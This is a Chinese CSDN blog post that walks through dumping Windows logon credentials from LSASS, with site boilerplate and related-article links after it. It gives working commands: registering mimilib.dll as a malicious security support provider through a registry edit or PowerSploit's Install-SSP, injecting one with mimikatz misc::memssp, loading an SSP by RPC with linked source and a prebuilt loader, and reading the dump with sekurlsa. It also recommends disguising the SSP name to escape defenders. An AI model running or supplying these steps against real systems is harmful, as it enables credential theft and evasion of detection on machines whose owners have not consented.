突破内存保护dump密码

最新推荐文章于 2024-03-06 14:03:59 发布
最新推荐文章于 2024-03-06 14:03:59 发布
阅读量276 收藏
点赞数
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31812157/article/details/130825581
版权

win 2008 r2 后就默认禁用了WDigest协议,所以不能直接抓到明文密码

修改注入表注册恶意ssp提取凭证

1.把mimilib.dll放到C:\WINDOWS\system32目录下



2.往lsa注册表中添加Security Packages的值

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "mimilib.dll"

3.重启系统就能在c:\windows\system32目录下得到kiwissp.log的凭据记录文件

上面这些操作在powersploit已有集成

Import-Module .\PowerSploit.psm1
Install-SSP -Path .\mimilib.dll

缺点一:列出当前ssp名称及信息的时候能看到,可能会比较明显,但mimikatz是开源的,我们要修改他创建的ssp名称、版本和生成的记录文件名字都是可以的,修改成跟自带服务名称比较相近,伪装一下,这样有可能会逃过蓝队的检查。甚至你对mimikatz进行自定义裁剪改写均可
缺点二:需要重启才能记录到密码,其他身份认证是无法记录凭据

mimilib.dll的主要代码地址:mimikatz/kssp.c at master · gentilkiwi/mimikatz · GitHub
主要函数有4个: 初始化,设置信息,保存凭据,删除,我们可以给他修改特征

利用mimikatz注入恶意ssp提取凭证

原理是通过注入到lsass进程,用hook技术使在身份验证的时候记录凭证

mimikatz # privilege::debug
mimikatz # misc::memssp

命令执行后,如果此时输入了新的凭据(例如runas,或者用户锁屏后重新登录),将会在c:\windows\system32下生成文件mimilsa.log

重启后失效

利用Rpc调用使lsass加载ssp

参考文章:绕过卡巴斯基dump进程lsass.exe内存_rpc dump kabasiji_xiangshen1990的博客-CSDN博客

xpn的源码:https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e

新建一个项目:添加源码中的三个文件

记得在sspi_h.h文件加入#pragma comment(lib, "Rpcrt4.lib")

这里有编译好的dll文件和loader

Penetration_Testing_POC/loader.zip at master · Mr-xn/Penetration_Testing_POC · GitHub

之后会保存在temp文件夹中

mimikatz读取即可

mimikatz # sekurlsa::minidump 1.bin
mimikatz # sekurlsa::logonPasswords full

K0e1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
X64dbg脚本实现自动DUMP运行中解密出的PE文件
摔不死的笨鸟的博客
12-19 1245
X64DBG脚本
wdump7(破解管理员密码
09-04
通过软件获取管理员密码hash,在通过彩虹表进行解密。。。
程序崩溃?教你一招dump文件分析轻松解决
热门推荐
阿花的博客
07-08 1万+
Dump文件是进程的内存镜像。可以把程序的执行状态通过调试器保存到dump文件中。
一文讲述内存取证的数据保存、数据分析、CTF实战案例
m0_61869253的博客
09-12 124
网络攻击内存化和网络犯罪的隐遁化,使部分关键数字证据只存在于物理内存或暂存于页面交换文件中,这使得传统的基于文件系统的计算机取证不能有效应对。内存取证通过全面获取内存数据、详尽的内存数据分析,并在此基础上提取与网络攻击或网络犯罪相关的数字证据,在网络应急响应和网络犯罪调查中发挥着不可替代的作用。Dumpit和Volatility是两款内存取证工具,今天将分享利用这两款工具的内存取证的方法,结合CTF内存取证题来做详解。欢迎各路高手一同切磋讨论。
IDA memory dump
江南小虫虫的博客
05-26 847
ida 内存dump的两种方式
梆梆加固之防内存dump分析
移动安全逆向研究
12-17 3779
梆专业版加固技术分析 之防内存 dump内存 dump比较 笼统 ,本篇 只介绍 使用 inotify相关 实现 (以 BB为例)。
C# 异常内存信息导出Dump文件
06-19
背景:很多情况下程序崩溃我们只能看到程序抛出来...如果将来遇到异常无法调试时就可以考虑将目标机器上异常现场内存导出到Dump文件中,然后通过Dump文件操作达到分析处理异常的目的,具体关于Dump的操作请参看如下文章...
JAVA jvm DUMP 内存分析
09-29
性能测试,线程的 dump 看到线程的 死锁,等待 运行状态
M8 android dump内存工具
08-12
M8 android dump内存工具是一个专为M8设备设计的工具,它可以帮助开发者获取设备内存的状态信息,以便于诊断内存泄漏、性能瓶颈等问题。本文将详细讲解这个工具的使用方法以及相关知识点。 首先,我们来看工具的...
JVM Dump与Java对象的内存布局
06-06
介绍了heap dump和thread dump,以及详细介绍dump工具Memory Analyzer的使用,最后讲解了Java对象的内存布局。
AntiDebugandMemoryDump:Android的反调试和反内存转储
03-04
反调试和内存转储 Android的反调试和反内存转储 此项目中使用了一些已知的反调试和反内存转储技术。 重点是在不依赖Java API的情况下以隐身方式使用这些技术。 以下是使用的技术 Java的反调试 JDWP在/ proc / self / task / comm和每个任务/ proc / self / task // comm中的存在表明该应用程序是可调试的。 本机反调试 在/ proc / self / status和每个任务/ proc / self / task // status中检查TracerPid!= 0 反记忆转储 防内存转储对于防止应用程序通过frida或或任何其他方式进行内存转储很有用。 监视以下文件 / proc / self / maps / proc / self / mem / proc / self / pagemap / proc /自我/任务
Memory Dump Analysis Anthology, Volume 6 内存dump分析系列卷6
10-17
Dmitry Vostokov 写的内存dump分析系列卷的第6卷,学习软件调试,内存分析,调试器使用非常好的参考材料
手机模拟加密门禁卡菜鸟教程
最新发布
petergu2011的博客
03-06 1968
通过2台具有NFC功能的手机和NFC tool软件,轻松实现手机模拟加密门禁卡。
Frida获取函数导出表内存dump so
ppLittleBoyHacker的博客
06-19 4325
背景 so库被加壳了,且导出表被和谐了 frida解决 var exports = Module.enumerateExportsSync("libxx.so"); var libxx = Process.getModuleByName("libxx.so"); send("*****************************************************"); send("name: " +libxx.name);
android内存dump分析,[原创]梆梆加固之防内存dump分析
weixin_42499159的博客
05-26 1870
 声明(打字好累)本文仅限于技术讨论,不得用于非法途径,后果自负。 参考资料https://bbs.pediy.com/thread-206293.htmhttps://github.com/parkerpeng/DroidAntihttp://blog.csdn.net/cool_way/article/details/22827433http://blog.csdn.net/m...
android trap攻防
随笔日志
03-13 2799
android trap攻防                                                                      图/文 h_one 0x01 反编译出错 1.插入无效指令是部分逆向工具崩溃 原理:大部分逆向工具都是线性读取字节码并解析, 如dex2jar,baksmali,apktool等,当遇到无效字节码时,就会引起反编译工具
dump解密后的so并修改原so
林羽的博客
06-06 4193
先执行IDA动态调试步骤 在JNI_ONLOAD下断点,越往后越好,按ctrl+s查看节点信息,后面的R表示读,W表示写,X表示执行 我们需要的so变成了三个部分,第一个RX表示里面是代码区,对我们没用,最主要的是找到原so文件中被混淆的数据区,其实只需要 RW 复制上图中的start和end的值到文件中,后面用,执行脚本把so dump出来,如下图,start和end替换成上图中的值,然后点击run即可dump出来,代码如下 static main(void) { auto fp, start, e
绕过卡巴斯基通过RPC控制lsass注入DLL
2ed
04-16 2816
参考国外的XPN以及3gstudent大佬的文章: https://blog.csdn.net/xiangshen1990/article/details/104872566 https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0 原理:正常的ssp扩展(dll)可以加载到lsass进程中去,比如kerberos验证都是通...
内存dump与休眠文件
lengye7的博客
04-22 442
我们知道,当dll加载到内存之后,不管其原先是否加壳,其二进制代码都是完全解密的,某些时候,dll是需要授权的,嘿嘿嘿。内存dump可以将其二进制数据全部dump出来,这样,我们就可以使用该dll中的接口了,但是由于全局变量和虚表之类的东西,所以该方法会很麻烦,自己需要处理的东西很多。今天听到别人说起使用休眠文件加上模拟器的方式来实时的dump文件,下面介绍休眠文件hiberfil.sys是一种文...
dump内存
05-26
对于dump内存,我可以给你一些概念和方法: 1. 内存转储(Memory Dump)是将计算机内存中的数据全部或部分复制到外部存储器中的一种操作。 2. 在Windows系统中,可以使用命令行工具dumpbin来进行内存转储。例如,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值